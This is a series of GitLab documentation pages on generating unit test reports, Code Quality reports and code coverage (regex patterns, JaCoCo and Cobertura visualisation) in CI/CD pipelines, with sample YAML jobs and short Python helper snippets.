If you already have a [markdownlint-cli2](https://github.com/DavidAnson/markdownlint-cli2) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add [`markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality) as a development dependency in your project.
1. If you don't already have one, create a `.markdownlint-cli2.jsonc` file at the top level of your repository.
1. Add an `outputFormatters` directive to `.markdownlint-cli2.jsonc`:

   ```json
   {
     "outputFormatters": [
       [ "markdownlint-cli2-formatter-codequality" ]
     ]
   }
   ```

1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. By default, the report file is named `markdownlint-cli2-codequality.json`.
1. Recommended. Add the report's filename to the repository's `.gitignore` file.

For more details and an example CI/CD job definition, see the [documentation for `markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality).
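Because many of these integrations rely on community-maintained formatters, it can be useful to sanity-check a generated report before declaring it as an artifact. The following validation script is hypothetical (not part of GitLab or any tool above); it checks the required fields described in the report format section:

```python
SEVERITIES = {"info", "minor", "major", "critical", "blocker"}

def issue_problems(issue):
    """Return the reasons one report entry fails the required Code Quality
    fields. An empty list means the entry looks valid."""
    problems = []
    for field in ("description", "check_name", "fingerprint", "severity"):
        if field not in issue:
            problems.append(f"missing field: {field}")
    if issue.get("severity") not in SEVERITIES:
        problems.append(f"invalid severity: {issue.get('severity')!r}")
    location = issue.get("location", {})
    if location.get("path", "").startswith("./"):
        problems.append("location.path must not be prefixed with ./")
    # Either location.lines.begin or location.positions.begin.line is accepted.
    begin = location.get("lines", {}).get("begin")
    if begin is None:
        begin = location.get("positions", {}).get("begin", {}).get("line")
    if not isinstance(begin, int):
        problems.append("missing location.lines.begin or location.positions.begin.line")
    return problems

good = {
    "description": "'unused' is assigned a value but never used.",
    "check_name": "no-unused-vars",
    "fingerprint": "7815696ecbf1c96e6894b779456d330e",
    "severity": "minor",
    "location": {"path": "lib/index.js", "lines": {"begin": 42}},
}
bad = {"description": "oops", "severity": "warning",
       "location": {"path": "./lib/index.js"}}
```

Running `issue_problems` over every entry of a report file before upload catches formatter regressions early, instead of silently producing an empty Code Quality widget.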
https://docs.gitlab.com/ci/unit_test_report_examples
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/unit_test_report_examples.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
unit_test_report_examples.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Unit test report examples
null
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

[Unit test reports](unit_test_reports.md) can be generated for many languages and packages. Use these examples as guidelines for configuring your pipeline to generate unit test reports for the listed languages and packages. You might need to edit the examples to match the version of the language or package you are using.

## Ruby

Use the following job in `.gitlab-ci.yml`. This includes the `artifacts:paths` keyword to provide a link to the Unit test report output file.

```yaml
## Use https://github.com/sj26/rspec_junit_formatter to generate a JUnit report format XML file with rspec
ruby:
  image: ruby:3.0.4
  stage: test
  before_script:
    - apt-get update -y && apt-get install -y bundler
  script:
    - bundle install
    - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml
  artifacts:
    when: always
    paths:
      - rspec.xml
    reports:
      junit: rspec.xml
```

## Go

Use the following job in `.gitlab-ci.yml`:

```yaml
## Use https://github.com/gotestyourself/gotestsum to generate a JUnit report format XML file with go
golang:
  stage: test
  script:
    - go install gotest.tools/gotestsum@latest
    - gotestsum --junitfile report.xml --format testname
  artifacts:
    when: always
    reports:
      junit: report.xml
```

## Java

There are a few tools that can produce JUnit report format XML files in Java.

### Gradle

In the following example, `gradle` is used to generate the test reports. If there are multiple test tasks defined, `gradle` generates multiple directories under `build/test-results/`.
In that case, you can leverage glob matching by defining the following path: `build/test-results/test/**/TEST-*.xml`:

```yaml
java:
  stage: test
  script:
    - gradle test
  artifacts:
    when: always
    reports:
      junit: build/test-results/test/**/TEST-*.xml
```

### Maven

For parsing [Surefire](https://maven.apache.org/surefire/maven-surefire-plugin/) and [Failsafe](https://maven.apache.org/surefire/maven-failsafe-plugin/) test reports, use the following job in `.gitlab-ci.yml`:

```yaml
java:
  stage: test
  script:
    - mvn verify
  artifacts:
    when: always
    reports:
      junit:
        - target/surefire-reports/TEST-*.xml
        - target/failsafe-reports/TEST-*.xml
```

## Python example

This example uses pytest with the `--junitxml=report.xml` flag to format the output into the JUnit report XML format:

```yaml
pytest:
  stage: test
  script:
    - pytest --junitxml=report.xml
  artifacts:
    when: always
    reports:
      junit: report.xml
```

## C/C++

There are a few tools that can produce JUnit report format XML files in C/C++.

### GoogleTest

In the following example, `gtest` is used to generate the test reports. If there are multiple `gtest` executables created for different architectures (`x86`, `x64`, or `arm`), you are required to run each test providing a unique filename. The results are then aggregated together.

```yaml
cpp:
  stage: test
  script:
    - gtest.exe --gtest_output="xml:report.xml"
  artifacts:
    when: always
    reports:
      junit: report.xml
```

### CUnit

[CUnit](https://cunity.gitlab.io/cunit/) can be made to produce [JUnit report format XML files](https://cunity.gitlab.io/cunit/group__CI.html) automatically when run using its `CUnitCI.h` macros:

```yaml
cunit:
  stage: test
  script:
    - ./my-cunit-test
  artifacts:
    when: always
    reports:
      junit: ./my-cunit-test.xml
```

## .NET

The [JunitXML.TestLogger](https://www.nuget.org/packages/JunitXml.TestLogger/) NuGet package can generate test reports for .Net Framework and .Net Core applications.
The following example expects a solution in the root folder of the repository, with one or more project files in sub-folders. One result file is produced per test project, and each file is placed in the artifacts folder. This example includes optional formatting arguments, which improve the readability of test data in the test widget. A full .Net Core [example is available](https://gitlab.com/Siphonophora/dot-net-cicd-test-logging-demo).

```yaml
## Source code and documentation are here: https://github.com/spekt/junit.testlogger/
Test:
  stage: test
  script:
    - 'dotnet test --test-adapter-path:. --logger:"junit;LogFilePath=..\artifacts\{assembly}-test-result.xml;MethodFormat=Class;FailureBodyFormat=Verbose"'
  artifacts:
    when: always
    paths:
      - ./**/*test-result.xml
    reports:
      junit:
        - ./**/*test-result.xml
```

## JavaScript

There are a few tools that can produce JUnit report format XML files in JavaScript.

### Jest

The [jest-junit](https://github.com/jest-community/jest-junit) npm package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Jest to generate the test reports:

```yaml
javascript:
  image: node:latest
  stage: test
  before_script:
    - 'yarn global add jest'
    - 'yarn add --dev jest-junit'
  script:
    - 'jest --ci --reporters=default --reporters=jest-junit'
  artifacts:
    when: always
    reports:
      junit:
        - junit.xml
```

To make the job pass when there are no `.test.js` files with unit tests, add the `--passWithNoTests` flag to the end of the `jest` command in the `script:` section.

### Karma

The [Karma-junit-reporter](https://github.com/karma-runner/karma-junit-reporter) npm package can generate test reports for JavaScript applications.
In the following `.gitlab-ci.yml` example, the `javascript` job uses Karma to generate the test reports:

```yaml
javascript:
  stage: test
  script:
    - karma start --reporters junit
  artifacts:
    when: always
    reports:
      junit:
        - junit.xml
```

### Mocha

The [JUnit Reporter for Mocha](https://github.com/michaelleeallen/mocha-junit-reporter) NPM package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Mocha to generate the test reports:

```yaml
javascript:
  stage: test
  script:
    - mocha --reporter mocha-junit-reporter --reporter-options mochaFile=junit.xml
  artifacts:
    when: always
    reports:
      junit:
        - junit.xml
```

## Flutter or Dart

This example `.gitlab-ci.yml` file uses the [JUnit Report](https://pub.dev/packages/junitreport) package to convert the `flutter test` output into JUnit report XML format:

```yaml
test:
  stage: test
  script:
    - flutter test --machine | tojunit -o report.xml
  artifacts:
    when: always
    reports:
      junit:
        - report.xml
```

## PHP

This example uses [PHPUnit](https://phpunit.de/index.html) with the `--log-junit` flag. You can also add this option using [XML](https://docs.phpunit.de/en/11.0/configuration.html#the-junit-element) in the `phpunit.xml` configuration file.

```yaml
phpunit:
  stage: test
  script:
    - composer install
    - vendor/bin/phpunit --log-junit report.xml
  artifacts:
    when: always
    reports:
      junit: report.xml
```

## Rust

This example uses [cargo2junit](https://crates.io/crates/cargo2junit), which is installed in the current directory. To retrieve JSON output from `cargo test`, you must enable the nightly compiler.

```yaml
run unittests:
  image: rust:latest
  stage: test
  before_script:
    - cargo install --root . cargo2junit
  script:
    - cargo test -- -Z unstable-options --format json --report-time | bin/cargo2junit > report.xml
  artifacts:
    when: always
    reports:
      junit:
        - report.xml
```

## Helm

This example uses the [Helm Unittest](https://github.com/helm-unittest/helm-unittest#docker-usage) plugin, with the `-t JUnit` flag to format the output as a JUnit report in XML format.

```yaml
helm:
  image: helmunittest/helm-unittest:latest
  stage: test
  script:
    - '-t JUnit -o report.xml -f tests/*[._]test.yaml .'
  artifacts:
    reports:
      junit: report.xml
```

The `-f tests/*[._]test.yaml` flag configures `helm-unittest` to look for files in the `tests/` directory that end in either:

- `.test.yaml`
- `_test.yaml`
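The `[._]` bracket expression acts as a one-character set, which you can sanity-check with Python's shell-style pattern matcher (the exact globbing engine `helm-unittest` uses may differ in edge cases, but the bracket set behaves the same way):

```python
from fnmatch import fnmatch

pattern = "tests/*[._]test.yaml"
candidates = [
    "tests/deployment.test.yaml",  # matches: ends in .test.yaml
    "tests/deployment_test.yaml",  # matches: ends in _test.yaml
    "tests/deployment-test.yaml",  # no match: "-" is not in the [._] set
    "tests/deployment.yaml",       # no match: missing the test suffix
]
matches = [path for path in candidates if fnmatch(path, pattern)]
```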
https://docs.gitlab.com/ci/testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Test with GitLab CI/CD and generate reports in merge requests
Unit tests, integration tests, test reports, coverage, and quality assurance.
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Use GitLab CI/CD to test the changes included in a feature branch. You can also display reports or link to important information directly from [merge requests](../../user/project/merge_requests/_index.md).

| Feature | Description |
|---------|-------------|
| [Accessibility Testing](accessibility_testing.md) | Automatically report A11y violations for changed pages in merge requests. |
| [Browser Performance Testing](browser_performance_testing.md) | Quickly determine the browser performance impact of pending code changes. |
| [Load Performance Testing](load_performance_testing.md) | Quickly determine the server performance impact of pending code changes. |
| [Code coverage](code_coverage/_index.md) | View test coverage results in merge requests, line-by-line coverage in file diffs, and overall metrics. |
| [Code Quality](code_quality.md) | Analyze your source code quality using the [Code Climate](https://codeclimate.com/) analyzer and show the Code Climate report right in the merge request widget area. |
| [Display arbitrary job artifacts](../yaml/_index.md#artifactsexpose_as) | Configure CI pipelines with the `artifacts:expose_as` parameter to directly link to selected [artifacts](../jobs/job_artifacts.md) in merge requests. |
| [Unit test reports](unit_test_reports.md) | Configure your CI jobs to use Unit test reports, and let GitLab display a report on the merge request so that it's easier and faster to identify the failure without having to check the entire job log. |
| [License Scanning](../../user/compliance/license_scanning_of_cyclonedx_files/_index.md) | Manage the licenses of your dependencies. |
| [Metrics reports](metrics_reports.md) | Track custom metrics like memory usage and performance between branches in merge requests. |
| [Fail fast testing](fail_fast_testing.md) | Run a subset of your RSpec test suite, so failed tests stop the pipeline before the full suite of tests run, saving resources. |

## Security Reports

{{< details >}}

- Tier: Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

In addition to the reports listed previously, GitLab can generate many types of [Security reports](../../user/application_security/_index.md) by scanning your project and reporting any vulnerabilities found:

| Feature | Description |
|---------|-------------|
| [Container Scanning](../../user/application_security/container_scanning/_index.md) | Analyze your Docker images for known vulnerabilities. |
| [Dynamic Application Security Testing (DAST)](../../user/application_security/dast/_index.md) | Analyze your running web applications for known vulnerabilities. |
| [Dependency Scanning](../../user/application_security/dependency_scanning/_index.md) | Analyze your dependencies for known vulnerabilities. |
| [Static Application Security Testing (SAST)](../../user/application_security/sast/_index.md) | Analyze your source code for known vulnerabilities. |
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Code coverage
breadcrumbs:
- doc
- ci
- testing
- code_coverage
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Configure code coverage to track and visualize how much of your source code is
covered by tests. You can:

- Track overall coverage metrics and trends using the `coverage` keyword.
- Visualize line-by-line coverage using the `artifacts:reports:coverage_report` keyword.

## Configure coverage reporting

Use the [`coverage`](../../yaml/_index.md#coverage) keyword to monitor your test
coverage and enforce coverage requirements in merge requests.

With coverage reporting, you can:

- Display the overall coverage percentage in merge requests.
- Aggregate coverage from multiple test jobs.
- Add coverage check approval rules.
- Track coverage trends over time.

To configure coverage reporting:

1. Add the `coverage` keyword to your pipeline configuration:

   ```yaml
   test-unit:
     script:
       - coverage run unit/
     coverage: '/TOTAL.+ ([0-9]{1,3}%)/'

   test-integration:
     script:
       - coverage run integration/
     coverage: '/TOTAL.+ ([0-9]{1,3}%)/'
   ```

1. Configure the regular expression (regex) to match your test output format.
   See [coverage regex patterns](#coverage-regex-patterns) for common patterns.
1. To aggregate coverage from multiple jobs, add the `coverage` keyword to each
   job you want to include.
1. Optional. [Add a coverage check approval rule](#add-a-coverage-check-approval-rule).

### Coverage regex patterns

The following sample regex patterns were designed to parse coverage output from
common test coverage tools. Test the regex patterns carefully. Tool output formats
can change over time, and these patterns might no longer work as expected.
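To see how such a pattern behaves, the following sketch (an illustration, not GitLab's implementation) applies the `/TOTAL.+ ([0-9]{1,3}%)/` pattern from the configuration above to sample pytest-cov output. When more than one line matches, GitLab uses the last matching line in the job log, which the sketch mimics:

```python
import re

# The pattern from the `coverage:` keyword above, without the surrounding slashes.
COVERAGE_RE = re.compile(r"TOTAL.+ ([0-9]{1,3}%)")

def extract_coverage(job_log):
    """Return the captured percentage from the last matching line, or None."""
    match = None
    for line in job_log.splitlines():
        found = COVERAGE_RE.search(line)
        if found:
            match = found  # keep the last match in the log
    return match.group(1) if match else None

sample_log = """\
collected 42 items
Name        Stmts   Miss  Cover
-------------------------------
TOTAL         200     20    90%
"""

print(extract_coverage(sample_log))  # 90%
```

If `extract_coverage` returns `None` for your tool's real output, the regex does not match and no coverage value would be reported for the job.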
<!-- vale gitlab_base.Spelling = NO -->
<!-- markdownlint-disable MD056 -->
<!--
Verify regex patterns carefully, especially patterns containing the pipe (`|`) character.
To use `|` in the text of a table cell (not as cell delimiters), you must escape it
with a backslash (`\|`).

Verify all tables render as expected both in GitLab and on docs.gitlab.com.
See: https://docs.gitlab.com/user/markdown/#tables
-->

{{< tabs >}}

{{< tab title="Python and Ruby" >}}

| Tool       | Language | Command        | Regex pattern |
|------------|----------|----------------|---------------|
| pytest-cov | Python   | `pytest --cov` | `/TOTAL.*? (100(?:\.0+)?\%\|[1-9]?\d(?:\.\d+)?\%)$/` |
| Simplecov  | Ruby     | `rspec spec`   | `/(?:LOC\s\(\d+\.\d+%\|Line Coverage:\s\d+\.\d+%)/` |

{{< /tab >}}

{{< tab title="C/C++ and Rust" >}}

| Tool      | Language | Command           | Regex pattern |
|-----------|----------|-------------------|---------------|
| gcovr     | C/C++    | `gcovr`           | `/^TOTAL.*\s+(\d+\%)$/` |
| tarpaulin | Rust     | `cargo tarpaulin` | `/^\d+.\d+% coverage/` |

{{< /tab >}}

{{< tab title="Java and JVM" >}}

| Tool      | Language    | Command                            | Regex pattern |
|-----------|-------------|------------------------------------|---------------|
| JaCoCo    | Java/Kotlin | `./gradlew test jacocoTestReport`  | `/Total.*?([0-9]{1,3})%/` |
| Scoverage | Scala       | `sbt coverage test coverageReport` | `/(?i)total.*? (100(?:\.0+)?\%\|[1-9]?\d(?:\.\d+)?\%)$/` |

{{< /tab >}}

{{< tab title="Node.js" >}}

| Tool | Command                              | Regex pattern |
|------|--------------------------------------|---------------|
| tap  | `tap --coverage-report=text-summary` | `/^Statements\s*:\s*([^%]+)/` |
| nyc  | `nyc npm test`                       | `/All files[^\|]*\|[^\|]*\s+([\d\.]+)/` |
| jest | `jest --ci --coverage`               | `/All files[^\|]*\|[^\|]*\s+([\d\.]+)/` |

{{< /tab >}}

{{< tab title="PHP" >}}

| Tool    | Command                                  | Regex pattern |
|---------|------------------------------------------|---------------|
| pest    | `pest --coverage --colors=never`         | `/Statement coverage[A-Za-z\.*]\s*:\s*([^%]+)/` |
| phpunit | `phpunit --coverage-text --colors=never` | `/^\s*Lines:\s*\d+.\d+\%/` |

{{< /tab >}}

{{< tab title="Go" >}}

| Tool              | Command          | Regex pattern |
|-------------------|------------------|---------------|
| go test (single)  | `go test -cover` | `/coverage: \d+.\d+% of statements/` |
| go test (project) | `go test -coverprofile=cover.profile && go tool cover -func cover.profile` | `/total:\s+\(statements\)\s+\d+.\d+%/` |

{{< /tab >}}

{{< tab title=".NET and PowerShell" >}}

| Tool      | Language   | Command | Regex pattern |
|-----------|------------|---------|---------------|
| OpenCover | .NET       | None    | `/(Visited Points).*\((.*)\)/` |
| dotnet test ([MSBuild](https://github.com/coverlet-coverage/coverlet/blob/master/Documentation/MSBuildIntegration.md)) | .NET | `dotnet test` | `/Total\s*\\|*\s(\d+(?:\.\d+)?)/` |
| Pester    | PowerShell | None    | `/Covered (\d{1,3}(\.\|,)?\d{0,2}%)/` |

{{< /tab >}}

{{< tab title="Elixir" >}}

| Tool        | Command            | Regex pattern |
|-------------|--------------------|---------------|
| excoveralls | None               | `/\[TOTAL\]\s+(\d+\.\d+)%/` |
| mix         | `mix test --cover` | `/\d+.\d+\%\s+\|\s+Total/` |

{{< /tab >}}

{{< /tabs >}}

<!-- vale gitlab_base.Spelling = YES -->
<!-- markdownlint-enable MD056 -->

## Coverage visualization

Use the [`artifacts:reports:coverage_report`](../../yaml/artifacts_reports.md#artifactsreportscoverage_report)
keyword to view which specific lines of code are covered by tests in merge requests.

You can generate coverage reports in these formats:

- Cobertura: For multiple languages including Java, JavaScript, Python, and Ruby.
- JaCoCo: For Java projects only.

Coverage visualization uses [artifacts reports](../../yaml/_index.md#artifactsreports) to:

1. Collect one or more coverage reports, including from wildcard paths.
1. Combine the coverage information from all reports.
1. Display the combined results in merge request diffs.

Coverage files are parsed in a background job, so there might be a delay between
pipeline completion and the visualization appearing in the merge request.

By default, coverage visualization data expires one week after creation.

### Configure coverage visualization

To configure coverage visualization:

1. Configure your test tool to generate a coverage report.
1. Add the `artifacts:reports:coverage_report` configuration to your pipeline:

   ```yaml
   test:
     script:
       - run tests with coverage
     artifacts:
       reports:
         coverage_report:
           coverage_format: cobertura  # or jacoco
           path: coverage/coverage.xml
   ```

For language-specific configuration details, see:

- [Cobertura coverage report](cobertura.md)
- [JaCoCo coverage report](jacoco.md)

### Coverage reports from child pipelines

Coverage reports from child pipelines appear in merge request diff annotations
but not in the merge request widget. This happens because parent pipelines cannot
access coverage report artifacts generated by child pipelines. Support for
displaying coverage reports from child pipelines in the merge request widget is
proposed in [epic 8205](https://gitlab.com/groups/gitlab-org/-/epics/8205).

## Add a coverage check approval rule

{{< details >}}

- Tier: Premium, Ultimate

{{< /details >}}

You can require specific users or a group to approve merge requests that reduce
the project's test coverage.
Prerequisites:

- [Configure coverage reporting](#configure-coverage-reporting).

To add a `Coverage-Check` approval rule:

1. Go to your project and select **Settings > Merge requests**.
1. Under **Merge request approvals**, do one of the following:
   - Next to the `Coverage-Check` approval rule, select **Enable**.
   - For manual setup, select **Add approval rule**, then enter `Coverage-Check` as the **Rule name**.
1. Select a **Target branch**.
1. Set the **Required number of approvals**.
1. Select the **Users** or **Groups** to provide approval.
1. Select **Save changes**.

{{< alert type="note" >}}

The `Coverage-Check` approval rule requires approval when the merge base pipeline
contains no coverage data, even if the merge request improves overall coverage.

{{< /alert >}}

## View coverage results

After a pipeline runs successfully, you can view code coverage results in:

- Merge request widget: See the coverage percentage and changes compared to the target branch.

  ![Merge request widget showing code coverage percentage](img/pipelines_test_coverage_mr_widget_v17_3.png)

- Merge request diff: Review which lines are covered by tests.
  Available with Cobertura and JaCoCo reports.
- Pipeline jobs: Monitor coverage results for individual jobs.

## View coverage history

You can track the evolution of code coverage for your project or group over time.

### For a project

To view the code coverage history for a project:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Analyze > Repository analytics**.
1. From the dropdown list, select the job you want to view historical data for.
1. Optional. To view a CSV file of the data, select **Download raw data (.csv)**.

### For a group

{{< details >}}

- Tier: Premium, Ultimate

{{< /details >}}

To view the code coverage history for all projects in a group:

1. On the left sidebar, select **Search or go to** and find your group.
1. Select **Analyze > Repository analytics**.
1. Optional. To view a CSV file of the data, select **Download historic test coverage data (.csv)**.

## Display coverage badges

Share your project's code coverage status using pipeline badges. To add a coverage
badge to your project, see [test coverage report badges](../../../user/project/badges.md#test-coverage-report-badges).

## Troubleshooting

### Remove color codes from code coverage

Some test coverage tools produce output with ANSI color codes that aren't parsed
correctly by the regular expression, which causes coverage parsing to fail.

Some coverage tools do not provide an option to disable color codes in the output.
If so, pipe the output of the coverage tool through a one-line script that strips
the color codes. For example:

```shell
lein cloverage | perl -pe 's/\e\[?.*?[\@-~]//g'
```
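If `perl` is not available in your job image, a short Python filter (an illustrative alternative, not part of GitLab) can strip the escape sequences in the same way before the coverage regex runs:

```python
import re

# Matches ANSI escape sequences such as "\x1b[32m" (set color) and "\x1b[0m" (reset).
ANSI_RE = re.compile(r"\x1b\[[0-9;]*[ -/]*[@-~]")

def strip_ansi(text):
    """Remove ANSI escape codes so the coverage regex sees plain text."""
    return ANSI_RE.sub("", text)

colored = "\x1b[32mTOTAL         200     20    90%\x1b[0m"
print(strip_ansi(colored))  # TOTAL         200     20    90%
```

You could invoke this inline, for example `your-coverage-tool | python3 strip_ansi.py`, where `strip_ansi.py` applies the filter to standard input (the script name is hypothetical).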
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: JaCoCo coverage report
breadcrumbs:
- doc
- ci
- testing
- code_coverage
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/227345) in GitLab 17.3 [with a flag](../../../administration/feature_flags/_index.md) named `jacoco_coverage_reports`. Disabled by default.
- [Generally available](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/170513) in GitLab 17.6. Feature flag `jacoco_coverage_reports` removed.

{{< /history >}}

[Leave your feedback](https://gitlab.com/gitlab-org/gitlab/-/issues/479804)

For JaCoCo coverage reports to work, you must generate a properly formatted
[JaCoCo XML file](https://www.jacoco.org/jacoco/trunk/coverage/jacoco.xml) that
provides [line coverage](https://www.eclemma.org/jacoco/trunk/doc/counters.html).

The JaCoCo coverage reports visualization supports:

- [Instructions (C0 Coverage)](https://www.eclemma.org/jacoco/trunk/doc/counters.html), `ci` (covered instructions) in reports.
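The per-line indicators described next are driven by the `ci` attribute of each `<line>` element. As a sketch (an illustration, not GitLab's parser), the classification can be expressed like this:

```python
import xml.etree.ElementTree as ET

report = """
<report>
  <line nr="83" mi="2" ci="0" mb="0" cb="0"/>
  <line nr="88" mi="0" ci="7" mb="0" cb="1"/>
</report>
"""

def classify(line):
    # ci > 0: at least one covered instruction -> shown green.
    # ci = 0: no covered instructions -> shown red.
    return "covered" if int(line.get("ci", "0")) > 0 else "uncovered"

root = ET.fromstring(report)
for line in root.iter("line"):
    print(line.get("nr"), classify(line))
# 83 uncovered
# 88 covered
```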
Coverage information displays in the merge request diff view with these indicators:

- Instructions covered (green): Lines with at least one covered instruction (`ci > 0`)
- No instructions covered (red): Lines without any covered instructions (`ci = 0`)
- No coverage information: Lines not included in the coverage report

For example, with this report output:

```xml
<line nr="83" mi="2" ci="0" mb="0" cb="0"/>
<line nr="84" mi="2" ci="0" mb="0" cb="0"/>
<line nr="85" mi="2" ci="0" mb="0" cb="0"/>
<line nr="86" mi="2" ci="0" mb="0" cb="0"/>
<line nr="88" mi="0" ci="7" mb="0" cb="1"/>
```

The merge request diff view displays coverage as follows:

![Merge request diff view showing coverage indicators with red bars for uncovered lines and green bars for covered lines.](img/jacoco_coverage_example_v18_3.png)

In this example, lines 83-86 show red bars for uncovered code, line 88 shows a
green bar for covered code, and lines 87, 89-90 have no coverage data.

## Add JaCoCo coverage job

To configure your pipeline to generate the coverage reports, add a job to your
`.gitlab-ci.yml` file. For example:

```yaml
test-jdk11:
  stage: test
  image: maven:3.6.3-jdk-11
  script:
    - mvn $MAVEN_CLI_OPTS clean org.jacoco:jacoco-maven-plugin:prepare-agent test jacoco:report
  artifacts:
    reports:
      coverage_report:
        coverage_format: jacoco
        path: target/site/jacoco/jacoco.xml
```

In this example, the `mvn` command generates the JaCoCo coverage report, and
`path` points to the generated report.

If the job generates multiple reports, [use a wildcard in the artifact path](_index.md#configure-coverage-visualization).

## File path conversion

JaCoCo reports provide relative file paths, but coverage report visualizations
require absolute paths. GitLab attempts to convert the relative paths to absolute
paths, using data from the related merge requests.

The path matching process is:

1. Find all the merge requests for the same pipeline ref.
1. For all the files that changed, find all the absolute paths.
1. For each relative path in the report, use the first matching absolute path.

This process might not always be able to find a suitable matching absolute path.

### Multiple modules or source directories

With identical file names for multiple modules or source directories, it might
not be possible to find the absolute path by default.

For example, GitLab cannot find the absolute paths if these files are changed in
a merge request:

- `src/main/java/org/acme/DemoExample.java`
- `src/main/other-module/org/acme/DemoExample.java`

For path conversion to succeed, you must have some unique difference in the
relative paths. For example, you can change one of the file or directory names:

- Change the filename:

  ```diff
    src/main/java/org/acme/DemoExample.java
  - src/main/other-module/org/acme/DemoExample.java
  + src/main/other-module/org/acme/OtherDemoExample.java
  ```

- Change the path:

  ```diff
    src/main/java/org/acme/DemoExample.java
  - src/main/other-module/org/acme/DemoExample.java
  + src/main/other-module/org/other-acme/DemoExample.java
  ```

You can also add a new directory, as long as the complete relative path is unique.

## Troubleshooting

### Metrics do not display for all changed files

Metrics might not display correctly if you create a new merge request from the
same source branch, but with a different target branch. The job doesn't consider
the diffs from the new merge request, and doesn't display any metrics for files
not contained in the diff of the other merge request. This happens even when the
generated coverage report contains metrics for the specified file.

To fix this issue, wait until the new merge request is created, then rerun your
pipeline or start a new one. The new merge request is then taken into account.
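The path matching described in the file path conversion section above can be sketched as follows. The matching rule and the file lists here are illustrative (GitLab's actual implementation is not shown), but the sketch demonstrates why duplicate relative paths across modules are ambiguous and why a unique suffix resolves them:

```python
def match_relative_path(relative_path, changed_files):
    """Return the first changed-file path that ends with the report's relative path."""
    for absolute_path in changed_files:
        if absolute_path.endswith(relative_path):
            return absolute_path
    return None

# Hypothetical files changed in the merge requests for the pipeline ref,
# after renaming one file to make the relative paths unique.
changed = [
    "src/main/java/org/acme/DemoExample.java",
    "src/main/other-module/org/acme/OtherDemoExample.java",
]

print(match_relative_path("org/acme/DemoExample.java", changed))
# src/main/java/org/acme/DemoExample.java
print(match_relative_path("org/acme/Missing.java", changed))
# None
```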
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Cobertura coverage report
breadcrumbs:
- doc
- ci
- testing
- code_coverage
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

For the coverage analysis to work, you have to provide a properly formatted
[Cobertura XML](https://cobertura.github.io/cobertura/) report to
[`artifacts:reports:coverage_report`](../../yaml/artifacts_reports.md#artifactsreportscoverage_report).
This format was originally developed for Java, but most coverage analysis
frameworks for other languages and platforms have plugins to add support for it, like:

- [simplecov-cobertura](https://rubygems.org/gems/simplecov-cobertura) (Ruby)
- [gocover-cobertura](https://github.com/boumenot/gocover-cobertura) (Go)
- [cobertura](https://www.npmjs.com/package/cobertura) (Node.js)

Other coverage analysis frameworks support the format out of the box, for example:

- [Istanbul](https://istanbul.js.org/docs/advanced/alternative-reporters/#cobertura) (JavaScript)
- [Coverage.py](https://coverage.readthedocs.io/en/coverage-5.0.4/cmd.html#xml-reporting) (Python)
- [PHPUnit](https://github.com/sebastianbergmann/phpunit-documentation-english/blob/master/src/textui.rst#command-line-options) (PHP)

After configuration, if your merge request triggers a pipeline that collects
coverage reports, the coverage information is displayed in the diff view. This
includes reports from any job in any stage in the pipeline.

The coverage displays for each line:

- `covered` (green): lines which have been checked at least once by tests
- `no test coverage` (orange): lines which are loaded but never executed
- no coverage information: lines which are non-instrumented or not loaded

Hovering over the coverage bar provides further information, such as the number
of times the line was checked by tests.

Uploading a test coverage report does not enable:

- [Test coverage results](_index.md#view-coverage-results) in the merge request widget.
- [Code coverage history](_index.md#view-coverage-history).

You must configure these separately.
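The per-line classes above come from the `hits` count recorded for each `line` element in a Cobertura report. As a sketch (illustrative only, using the standard Cobertura `number` and `hits` attributes), a report line can be classified like this:

```python
import xml.etree.ElementTree as ET

snippet = """
<class name="User" filename="Auth/User.cs" line-rate="0.5">
  <lines>
    <line number="10" hits="3" branch="false"/>
    <line number="11" hits="0" branch="false"/>
  </lines>
</class>
"""

def classify(line):
    # hits > 0: checked at least once by tests (green).
    # hits = 0: loaded but never executed (orange).
    return "covered" if int(line.get("hits", "0")) > 0 else "no test coverage"

root = ET.fromstring(snippet)
for line in root.iter("line"):
    print(line.get("number"), classify(line))
# 10 covered
# 11 no test coverage
```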
